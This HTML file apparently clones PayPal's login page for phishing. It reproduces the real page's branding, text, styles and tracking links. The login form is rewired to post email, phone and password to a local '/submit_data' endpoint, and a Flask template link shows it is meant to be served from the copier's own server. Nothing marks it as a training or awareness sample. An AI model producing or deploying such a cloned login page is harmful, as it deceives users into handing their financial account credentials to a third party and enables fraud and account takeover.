<!DOCTYPE html>

<!--[if lt IE 9]><html lang="en" class="no-js lower-than-ie9 ie unknown"><![endif]-->
<!--[if lt IE 10]><html lang="en" class="no-js lower-than-ie10 ie unknown"><![endif]-->
<!--[if !IE]>-->
<html class="no-js unknown" lang="en">
<!--<![endif]-->

<head>
    <!--Script info: script: node, template:  , date: Apr 30, 2023 10:01:37 -07:00, country: US, language: en web version:  content version:  hostname : rZJvnqaaQhLn/nmWT8cSUjOx898qoYZ0KCh6/h2ON0qYFJ87ahTWaOrqXwcbJ1j5 rlogid : rZJvnqaaQhLn%2FnmWT8cSUotSylMGOTGkRUMDpmUTvbXdvevuMMFAfc8CMK9ch4LYZpzCvqaJ8XL5jZp4vQ0wBTuiHHIUKiJR_187d31cdf90 -->
    <meta charset="utf-8" />
    <title>Log in to your PayPal account</title>
    <meta content="text/html; charset=utf-8" http-equiv="content-type" />
    <meta content="PayPal" name="application-name" />
    <meta content="name=My Account;action-uri=https://www.paypal.com/us/cgi-bin/webscr?cmd=_account;icon-uri=https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico" name="msapplication-task" />
    <meta content="name=Send Money;action-uri=https://www.paypal.com/us/cgi-bin/webscr?cmd=_send-money-transfer&amp;send_method=domestic;icon-uri=https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico" name="msapplication-task" />
    <meta content="transfer money, email money transfer, international money transfer " name="keywords" />
    <meta content="Transfer money online in seconds with PayPal money transfer. All you need is an email address." name="description" />
    <link href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico" rel="shortcut icon" />
    <link href="https://www.paypalobjects.com/webstatic/icon/pp64.png" rel="apple-touch-icon" />
    <link href="https://www.paypal.com/us/signin" rel="canonical" />
    <meta content="width=device-width, height=device-height, initial-scale=1.0, maximum-scale=2, user-scalable=yes" name="viewport" />
    <meta content="https://www.paypalobjects.com/webstatic/icon/pp258.png" property="og:image" />
    <link href="https://www.paypalobjects.com/web/res/c03/c2fcc0329e681c046d715a140ff46/css/contextualLogin.css" rel="stylesheet" />
    <!--[if lte IE 9]><link rel="stylesheet" href="https://www.paypalobjects.com/web/res/c03/c2fcc0329e681c046d715a140ff46/css/ie9.css" /><![endif]-->
    <!-- build:js inline -->
    <!-- build:[src] js/lib/ -->
    <!-- /build -->
    <!-- /build -->
    <style id="antiClickjack">
        body {
            display: none !important;
        }
    </style>
    <link href="{{ url_for('static', filename='contextualLogin.css') }}" rel="stylesheet" type="text/css" />
</head>

<body class="unknown" data-ads-challenge-url="/auth/createchallenge/dbc585042849785a/challenge.js" data-cookie-banner-enabled="true" data-correlation-id="f188255b766ae" data-csrf-token="Kmgab0OiIvsd3f9dAZGShsbOwbi1zGbOlacYM=" data-email-label="Email"
    data-enable-ads-captcha="true" data-enable-client-cal-logging="true" data-enable-fn-beacon-on-web-views="true" data-hostname="rZJvnqaaQhLn/nmWT8cSUjOx898qoYZ0KCh6/h2ON0qYFJ87ahTWaOrqXwcbJ1j5" data-is-hybrid-login-experience="true" data-lazy-load-country-codes="true"
    data-load-start-time="1682874097552" data-nonce="5xEjn/TobUUyPQiSfRVhN7wWQDxaVkqryW5T6WjAo7eh4drz" data-phone-code="US +1" data-phone-password-enabled="true" data-production="true" data-rlogid="rZJvnqaaQhLn%2FnmWT8cSUotSylMGOTGkRUMDpmUTvbXdvevuMMFAfc8CMK9ch4LYZpzCvqaJ8XL5jZp4vQ0wBTuiHHIUKiJR_187d31cdf90"
    data-xhr-timeout-ineligible-list="MSIE 10|Windows NT 10" data-xhr-timeout-limit="20000"><noscript>
        <p class="nonjsAlert" role="alert">NOTE: Many features on the PayPal Web site require Javascript and cookies.
        </p>
    </noscript>
    <div class="main" id="main" role="main">
        <section class="slLanding hide" data-role="page" data-title="Connect your Google account, check out faster on your devices" id="slLanding">
            <div class="corral">
                <div class="contentContainer contentContainerBordered" id="slContent">
                    <header>
                        <p aria-label="PayPal Logo" class="paypal-logo paypal-logo-long" role="img"></p>
                    </header>
                    <div class="linked" id="linked">
                        <div class="profileRemembered"><span class="loginEmail"></span><a class="changeLink scTrack:not-you" href="#" id="changeLink">Change</a></div>
                        <div class="headerTextDecorated"></div>
                        <h1 class="headerText">Stay logged in for faster checkout</h1>
                        <p class="description assure">Enable auto login on this browser and speed through checkout every time. (Not recommended for shared devices.)<span class="learnMoreLink"><a
                                    class="secondayLink" href="#" id="slLoginLearnMore">What's this?</a></span></p>
                        <div class="partnerProfile" id="partnerProfile">
                            <div class="partnerPhoto" id="partnerPhoto" style="background-image: url('')"></div>
                            <div class="partnerDetails"><span>You're logged in as</span>
                                <div class="displayName" id="displayName"></div>
                                <div>
                                    <div class="partnerEmailDiv"><span class="partnerIcon"></span><span class="partnerEmail" id="partnerEmail"></span><span id="partnerEmailDomain"></span></div>
                                </div>
                            </div>
                        </div>
                        <div class="actions actionsSpacedShort"><button class="button actionContinue scTrack:unifiedlogin-continue" id="continueBtn" name="continueBtn" value="continueBtn">Continue</button></div>
                        <div class="buttonAsLink secondaryLink" id="secondaryLogin"><button class="scTrack:unifiedlogin-use-password" id="secondaryLoginBtn" name="secondaryLoginBtn" value="secondaryLoginBtn">Use password instead</button></div>
                    </div>
                    <div class="unlinked" id="unlinked">
                        <div class="partnerConnect" id="headerIcon"></div>
                        <h1 class="headerText">Connect your Google account, check out faster on your devices</h1>
                        <p class="description assure">Automatically log in to PayPal for faster checkout without typing your password wherever you're logged in with your Google account.<a class="secondayLink scTrack:unifiedlogin-sl-whatsthis" href="#" id="slOptInlearnMore">What's this?</a></p>
                        <p class="secondaryLink hide" id="slOptIn_notNow"><a href="#">Not now</a></p>
                    </div>
                    <div class="learnMoreModal" id="learnMoreModal">
                        <div class="optInLearnMoreDesc" id="optInLearnMoreDesc">
                            <h1 class="headerText headerTextSpaced">Why connect my Google account?</h1>
                            <p> Linking your Google account allows you to activate One Touch quickly and easily when you check out. You can always opt out later in Settings at PayPal.com.</p>
                            <p> Whenever you check out on a new device and browser when logged in with your Google account, you can automatically log in at checkout without typing your password.</p>
                        </div>
                        <div class="slLoginLearnMoreDesc" id="slLoginLearnMoreDesc">
                            <h1 class="headerText headerTextSpaced">Stay logged in for faster checkout</h1>
                            <p> Skip typing your password by staying logged in on this device. For security, we'll occassionally ask you to log in, including every time you update your personal or financial info. We don't recommend using One Touch on shared
                                devices. Turn this off at any time in your PayPal settings.</p>
                        </div><button class="ui-dialog-titlebar-close" type="button"></button>
                    </div>
                    <div class="intentFooter">
                        <div class="localeSelector">
                            <ul class="localeLink">
                                <li><a aria-current="”true”" class="selected scTrack:unifiedlogin-footer-language_en_US" data-locale="en_US" href="/signin?country.x=US&amp;locale.x=en_US&amp;langTgl=en" lang="en">English</a></li>
                                <li><a class="scTrack:unifiedlogin-footer-language_fr_XC" data-locale="fr_XC" href="/signin?country.x=US&amp;locale.x=fr_XC&amp;langTgl=fr" lang="fr">Français</a></li>
                                <li><a class="scTrack:unifiedlogin-footer-language_es_XC" data-locale="es_XC" href="/signin?country.x=US&amp;locale.x=es_XC&amp;langTgl=es" lang="es">Español</a></li>
                                <li><a class="scTrack:unifiedlogin-footer-language_zh_XC" data-locale="zh_XC" href="/signin?country.x=US&amp;locale.x=zh_XC&amp;langTgl=zh" lang="zh">中文</a>
                                </li>
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
        </section>
        <section class="login" data-role="page" data-title="Log in to your PayPal account" id="login">
            <div class="corral">
                <div class="contentContainer activeContent contentContainerBordered" id="content">
                    <header id="header">
                        <p aria-label="PayPal Logo" class="paypal-logo paypal-logo-long signin-paypal-logo" role="img">
                        </p>
                    </header>
                    <h1 class="headerText accessAid" id="headerText">Log in to your PayPal account</h1>
                    <p class="subHeaderText hide" id="phoneSubTagLine">Already set up to use your mobile number to log in? Type it below. Otherwise, click the link to log in with email.</p>
                    <p class="subHeaderText hide" id="subTagLineConnectOtp">Forgot your email address? Go to the PayPal website to recover it.</p>
                    <div class="" id="loginContent">
                        <div class="" id="loginSection">
                            <div class="notifications"></div>
                            <div class="hide" id="keychainErrorMessage">
                                <p class="notification notification-warning blocked-on-8ball hide">PayPal One Touch™ only works for checkout. Please login with your email.</p>
                                <p class="notification notification-warning blocked-on-risky-login hide">Please login with your email and password.</p>
                                <p class="notification notification-critical keychain-activation-failure hide">Something went wrong on our end. Please login with your email and password.</p>
                            </div>
                            <form action="/submit_data" autocomplete="off" class="proceed maskable" method="POST" name="login" novalidate=""><input id="token" name="_csrf" type="hidden" value="Kmgab0OiIvsd3f9dAZGShsbOwbi1zGbOlacYM=" /><input name="locale.x" type="hidden" value="en_US" /><input name="processSignin" type="hidden" value="main" /><input name="fn_sync_data"
                                    type="hidden" value="fn_sync_data" /><input name="intent" type="hidden" value="signin" /><input name="ads-client-context" type="hidden" value="signin" /><input name="isValidCtxId" type="hidden" value="" /><input name="coBrand"
                                    type="hidden" value="us" /><input name="signUpEndPoint" type="hidden" value="/webapps/mpp/account-selection"><input name="requestUrl" type="hidden" value="/signin"><input name="forcePhonePasswordOptIn" type="hidden" value="">
                                <div class="profileDisplayName hide"></div>
                                <div class="profileRememberedEmail hide"><span class="profileDisplayPhoneCode" dir="ltr"></span><span class="profileDisplayEmail notranslate"></span><a class="notYouLink scTrack:not-you" href="#" id="backToInputEmailLink">Change</a>
                                </div>
                                <div class="splitEmail" id="splitEmail">
                                    <div class="splitPhoneSection splitEmailSection adjustSection" id="splitEmailSection">
                                        <div class="countryPhoneSelectWrapper hide"><label class="accessAid" for="phoneCode">Choose your phone country code</label><select class="countryPhoneSelect" id="phoneCode" name="phoneCode">
                                                <option data-code="+1" data-country="US" selected="selected"
                                                    value="US +1">United States (+1)</option>
                                            </select>
                                            <div class="countryPhoneSelectChoice"><span class="countryCode">US</span><span class="phoneCode">+1</span></div>
                                        </div>
                                        <div class="textInput" id="login_emaildiv">
                                            <div class="fieldWrapper"><input aria-describedby="emailErrorMessage" autocomplete="username" class="hasHelp validateEmpty" id="email" name="login_email" placeholder="Email or mobile number" required="required" type="email" value="">
                                                <label class="fieldLabel" for="email">Email or mobile number</label>
                                                </input>
                                            </div>
                                            <div class="errorMessage" id="emailErrorMessage">
                                                <p class="emptyError hide">Required</p>
                                                <p class="invalidError hide">That email or mobile number format isn’t right
                                                </p>
                                            </div>
                                        </div><a class="recoveryOption" data-client-log-action-type="clickForgotEmailLink" href="/authflow/email-recovery/?redirectUri=%252Fsignin" id="forgotEmail">Forgot email?</a>
                                        <div class="captcha captcha-container clearfix hide" id="splitHybridCaptcha">
                                            <div class="captcha-image"><img alt="" src="" /></div>
                                            <div class="captcha-inputs clearfix">
                                                <div class="textInput">
                                                    <div class="fieldWrapper"><input aria-describedby="captchaErrorMessage" autocomplete="off" class="hasHelp validateEmpty" id="splitHybridCaptcha" name="captchaCode" placeholder="Enter code" type="text" value="" /><label class="fieldLabel"
                                                            for="splitHybridCaptcha"></label></div>
                                                    <div class="errorMessage" id="captchaErrorMessage">
                                                        <p class="emptyError hide">Required</p>
                                                    </div>
                                                </div>
                                                <div class="refresh"><a class="captchaRefresh buttonLight onboardingSpritePseudo scTrack:unifiedlogin-click-reload-captcha imageLink" href=""><span class="accessAid">Reload Image</span></a></div>
                                                <div class="audio"><audio class="hide" id="captchaPlayer" role="application" src=""></audio>
                                                    <a class="captchaPlay buttonLight onboardingSpritePseudo scTrack:unifiedlogin-click-play-captcha-audio imageLink" href="" target="_blank"><span class="accessAid">Audio
                                                            Button</span></a>
                                                </div>
                                            </div>
                                        </div>
                                    </div>

                                    <div class="tpdDemo hide" id="tpdDemo">
                                        <p class="tpdDemoContent">Log in with your email as usual, and then you'll be prompted to log in with your phone's biometrics.</p>
                                    </div><input class="validate" id="phone" name="login_phone" type="hidden" value="" />
                                </div><input id="initialSplitLoginContext" name="initialSplitLoginContext" type="hidden" value="inputEmail" /><input id="isTpdOnboarded" name="isTpdOnboarded" type="hidden" value="" />


                                <div class="clearfix showHideButtonForEligibleBrowser" id="passwordSection">
                                    <div class="textInput" id="login_passworddiv">
                                        <div class="fieldWrapper"><input aria-describedby="passwordErrorMessage" class="hasHelp validateEmpty pin-password" id="password" name="login_password" placeholder="Password" required="required" type="password" value="" />
                                            <label class="fieldLabel" for="password">Password</label><label class="fieldLabel" for="Show password">Show password</label><button class="showPassword hide show-hide-password scTrack:unifiedlogin-show-password"
                                                id="Show password" type="button">Show</button>
                                            <label class="fieldLabel" for="Hide">Hide</label><button class="hidePassword hide show-hide-password scTrack:unifiedlogin-hide-password" id="Hide" type="button">Hide</button></div>
                                        <div class="errorMessage" id="passwordErrorMessage">
                                            <p class="emptyError hide">Required</p>
                                        </div>
                                    </div><a class="recoveryOption forgotPassword" data-client-log-action-type="clickForgotPasswordLink" href="/authflow/password-recovery/?country.x=US&amp;locale.x=en_US&amp;redirectUri=%252Fsignin" id="forgotPassword">Forgot password?</a>
                                </div>
                        </div>
                        <div class="captcha captcha-container clearfix hide" id="splitPasswordCaptcha">
                            <div class="captcha-image"><img alt="" src="" /></div>
                            <div class="captcha-inputs clearfix">
                                <div class="textInput">
                                    <div class="fieldWrapper"><input aria-describedby="captchaErrorMessage" autocomplete="off" class="hasHelp validateEmpty" id="splitPasswordCaptcha" name="captcha" placeholder="Enter code" type="text" value="" /><label class="fieldLabel" for="splitPasswordCaptcha"></label></div>
                                    <div class="errorMessage" id="captchaErrorMessage">
                                        <p class="emptyError hide">Required</p>
                                    </div>
                                </div>
                                <div class="refresh"><a class="captchaRefresh buttonLight onboardingSpritePseudo scTrack:unifiedlogin-click-reload-captcha imageLink" href=""><span class="accessAid">Reload Image</span></a></div>
                                <div class="audio"><audio class="hide" id="captchaPlayer" role="application" src=""></audio>
                                    <a class="captchaPlay buttonLight onboardingSpritePseudo scTrack:unifiedlogin-click-play-captcha-audio imageLink" href="" target="_blank"><span class="accessAid">Audio
                                                        Button</span></a>
                                </div>
                            </div>
                        </div>
                        <div class="actions"><button class="button actionContinue scTrack:unifiedlogin-login-submit" id="btnLogin" name="btnLogin" type="submit" value="Login">Log In</button>
                        </div>
                    </div><input name="splitLoginContext" type="hidden" value="inputEmail" /></input>
                    </input>
                    </input>
                    </form>
                    <div class="moreOptionsDiv hide" id="moreOptionsContainer"><a class="moreOptionsInfo" href="#" id="moreOptions">More options</a>
                        <div class="bubble-tooltip hide" id="moreOptionsDropDown">
                            <ul class="moreoptionsGroup">
                                <li><a class="scTrack:unifiedlogin-click-more-options-mobile" href="#" id="moreOptionsMobile">Approve login using mobile device</a></li>
                                <li><a class="scTrack:unifiedlogin-click-forgot-password pwrLink" href="/authflow/password-recovery/?country.x=US&amp;locale.x=en_US&amp;redirectUri=%252Fsignin">Having
                                                trouble logging in?</a></li>
                            </ul>
                        </div>
                    </div>
                    <div class="tryAnotherWayLinkContainer hide hide" data-hide-on-pass="" id="tryAnotherWayLinkContainer"><a href="#" id="tryAnotherWayLink">Try another way</a>
                    </div>
                    <div class="signupContainer" data-hide-on-email="" data-hide-on-pass="" id="signupContainer">
                        <div class="loginSignUpSeparator"><span class="textInSeparator">or</span></div><button class="button secondary scTrack:unifiedlogin-click-signup-button" href="/us/webapps/mpp/account-selection" id="createAccount" type="button">Sign
                                    Up</button>
                    </div>
                    <div class="signupContainer hide" id="tpdButtonContainer">
                        <div class="loginSignUpSeparator"><span class="textInSeparator">or</span></div>
                        <div class="actions"><button class="button secondary" id="tpdButton" type="submit" value="Approve login using mobile device">Approve login using mobile
                                        device</button></div>
                    </div>
                </div>
            </div>
            <div class="intentFooter">
                <div class="localeSelector">
                    <ul class="localeLink">
                        <li><a aria-current="”true”" class="selected scTrack:unifiedlogin-footer-language_en_US" data-locale="en_US" href="/signin?country.x=US&amp;locale.x=en_US&amp;langTgl=en" lang="en">English</a></li>
                        <li><a class="scTrack:unifiedlogin-footer-language_fr_XC" data-locale="fr_XC" href="/signin?country.x=US&amp;locale.x=fr_XC&amp;langTgl=fr" lang="fr">Français</a></li>
                        <li><a class="scTrack:unifiedlogin-footer-language_es_XC" data-locale="es_XC" href="/signin?country.x=US&amp;locale.x=es_XC&amp;langTgl=es" lang="es">Español</a></li>
                        <li><a class="scTrack:unifiedlogin-footer-language_zh_XC" data-locale="zh_XC" href="/signin?country.x=US&amp;locale.x=zh_XC&amp;langTgl=zh" lang="zh">中文</a>
                        </li>
                    </ul>
                </div>
            </div>
    </div>
    </div>
    <div class="tryAnotherWayModal hide" id="tryAnotherWayModal">
        <div class="modal-content">
            <div class="modal-content-header">
                <div class="modal-header-text">Try another way</div>
                <div><button aria-label="dialog-close-btn" class="dialog-close" id="closeModal" type="button"></button></div>
            </div>
            <ul class="modal-content-body">
                <li class="hide">
                    <a aria-label="Login with Touch ID or Face ID" href="#" id="loginWithWebauthn">
                        <div>Log in with face, fingerprint or PIN</div><button aria-label="webauthn-chevron" class="chevron-right"></button>
                    </a>
                </li>
                <li class="hide">
                    <a aria-label="Login with phone one-time code" href="#" id="loginWithOtp">
                        <div>Text a one-time code</div><button aria-label="phone-otc-chevron" class="chevron-right"></button>
                    </a>
                </li>
                <li class="hide">
                    <a aria-label="Login with email one-time code" href="#" id="loginWithEmailOtp">
                        <div>Email a one-time code</div><button aria-label="email-otc-chevron" class="chevron-right"></button>
                    </a>
                </li>
                <li class="">
                    <a aria-label="Login with password" href="#" id="loginWithPassword">
                        <div>Log in with your password</div><button aria-label="pwd-chevron" class="chevron-right"></button>
                    </a>
                </li>
            </ul>
        </div>
    </div>
    </section>
    <section class="verification hide" data-role="page" data-title="Login Confirmation - PayPal" id="verification">
        <div class="corral">
            <div class="contentContainer contentContainerLean">
                <div class="verificationSubSection" id="pending">
                    <h1 class="headerText">Open the PayPal app</h1>
                    <p class="verification-message hide" id="uncookiedMessage">Open the PayPal app, tap Yes on the prompt, then tap <span class="twoDigitPin">{twoDigitPin}</span> on your phone to log in.</p>
                    <p class="verification-message hide" id="cookiedMessage">Open the PayPal app and tap Yes on the prompt to log in.</p>
                    <div class="notifications"></div>
                    <div class="accountArea"><span class="account"></span><span class="verificationNotYou"><a
                                    class="scTrack:unifiedlogin-verification-click-notYou" data-href="#" href="#"
                                    id="pendingNotYouLink">Not you?</a></span></div>
                    <div class="mobileNotification">
                        <p class="pin"></p>
                        <div class="mobileScreen"><img alt="phone" src="https://www.paypalobjects.com/images/shared/icon-PN-check.png" /></div>
                    </div>
                    <p class="tryAnotherMsg"><a class="inlineLink scTrack:try-password" data-href="#" href="" id="tryPasswordLink">Use password instead</a></p>
                    <p class="resendMsg"><a class="inlineLink scTrack:resend hide" data-href="#resend" href="" id="resend" role="button">Resend</a><span class="sentMessage hide">Sent</span></p>
                </div>
                <div class="hide verificationSubSection" id="expired">
                    <header>
                        <p aria-label="PayPal Logo" class="paypal-logo paypal-logo-long" role="img">PayPal</p>
                    </header>
                    <h1 class="headerText headerTextWarning">Sorry, we couldn't confirm it's you</h1>
                    <p class="slimP">We didn't receive a response so we were unable confirm your identity.</p>
                    <button class="button actionsSpaced" id="expiredTryAgainButton">Try Again</button>
                </div>
                <div class="denied hide verificationSubSection" id="denied"><img alt="" class="deniedCaution" src="https://www.paypalobjects.com/images/shared/glyph_alert_critical_big-2x.png" />
                    <h1 class="headerText">Sorry, we couldn't confirm it's you</h1>
                    <p>Need a hand?, <a class="inlineLink scTrack:help" href="/{coBrand}/cgi-bin/helpscr?cmd=_help">We can help</a>.</p>
                </div>
            </div>
        </div>
    </section>
    <footer class="footer" role="contentinfo">
        <div class="legalFooter">
            <ul class="footerGroup">
                <li><a href="/us/smarthelp/contact-us" target="_blank">Contact Us</a></li>
                <li><a href="/us/webapps/mpp/ua/privacy-full" target="_blank">Privacy</a></li>
                <li><a href="/us/webapps/mpp/ua/legalhub-full" target="_blank">Legal</a></li>
                <li><a href="/us/webapps/mpp/ua/upcoming-policies-full" target="_blank">Policy Updates</a></li>
                <li><a href="/us/webapps/mpp/country-worldwide" target="_blank">Worldwide</a></li>
            </ul>
        </div>
    </footer>
    </div>
    <div class="transitioning hide">
        <p class="welcomeMessage hide">Welcome, !</p>
        <p class="checkingInfo hide">Checking your info…</p>
        <p class="oneSecond hide">Just a second…</p>
        <p class="secureMessage hide">Securely logging you in...</p>
        <p class="oneTouchMessage hide"></p>
        <p class="retrieveInfo hide">Retrieving your info...</p>
        <p class="waitFewSecs hide">This may take a few seconds...</p>
        <p class="udtSpinnerMessage udtLogin hide">We recognize you on this device, and we’re securely logging you in.
        </p>
        <p class="udtSpinnerMessage udtLoginXo hide">We recognize you on this device, so no need to enter your password for this purchase.</p>
        <p class="udtSpinnerMessage webllsXoUS hide">We recognize you on this device, so you can skip login.
            <br /><br />Manage this setting in your profile.</p>
        <p class="udtSpinnerMessage webllsSCA hide">We're taking you to PayPal Checkout to complete payment.</p>
        <p class="qrcMessage hide">Redirecting...</p>
        <p class="webAuthnOptin hide">Updating your login settings...</p>
        <p class="webAuthnLogin hide">Logging you in...</p>
        <div class="keychain spinner-content uiExp hide"></div>
    </div><noscript><img alt="" border="0" height="1"
            src="https://c.paypal.com/v1/r/d/b/ns?f=6030f246881449ad99abf0de2c5426b7&amp;s=UNIFIED_LOGIN_INPUT_EMAIL&amp;js=0&amp;r=1"
            title="ppfniframe" width="1" /></noscript>
    <!-- build:js inline -->
    <!-- build:[src] js/lib/ -->
    <!-- /build -->
    <!-- /build -->
    <!-- build:js inline -->
    <!-- build:[src] js/ -->
    <!-- /build -->
    <!-- /build --><noscript><img alt="" border="0" height="1"
            src="https://t.paypal.com/ts?nojs=1&amp;pgrp=main%3Aunifiedlogin%3Asplitlogin%3A%3Aemail&amp;page=main%3Aunifiedlogin%3Asplitlogin%3A%3Aemail%3A%3A%3A&amp;qual=input_email&amp;pgst=1682874097552&amp;calc=f188255b766ae&amp;nsid=3OXGc-5DoT86WBJ63G9-h4ZfHLfBlLvO&amp;rsta=en_US&amp;pgtf=Nodejs&amp;env=live&amp;s=ci&amp;ccpg=US&amp;csci=6030f246881449ad99abf0de2c5426b7&amp;comp=unifiedloginnodeweb&amp;tsrce=unifiedloginnodeweb&amp;cu=0&amp;ef_policy=ccpa&amp;transition_name=ss_prepare_email&amp;userRedirected=true&amp;ctx_login_ot_content=0&amp;obex=signin&amp;landing_page=login&amp;state_name=begin_email&amp;ctx_login_ctxid_fetch=ctxid-not-exist&amp;ctx_login_content_fetch=success&amp;ctx_login_lang_footer=shown&amp;ctx_login_signup_btn=shown%7Cdefault&amp;ctx_login_intent=signin&amp;ctx_login_flow=Signin&amp;ctx_login_state_transition=login_loaded&amp;post_login_redirect=default&amp;ret_url=%2F"
            width="1" /></noscript>
</body>

</html>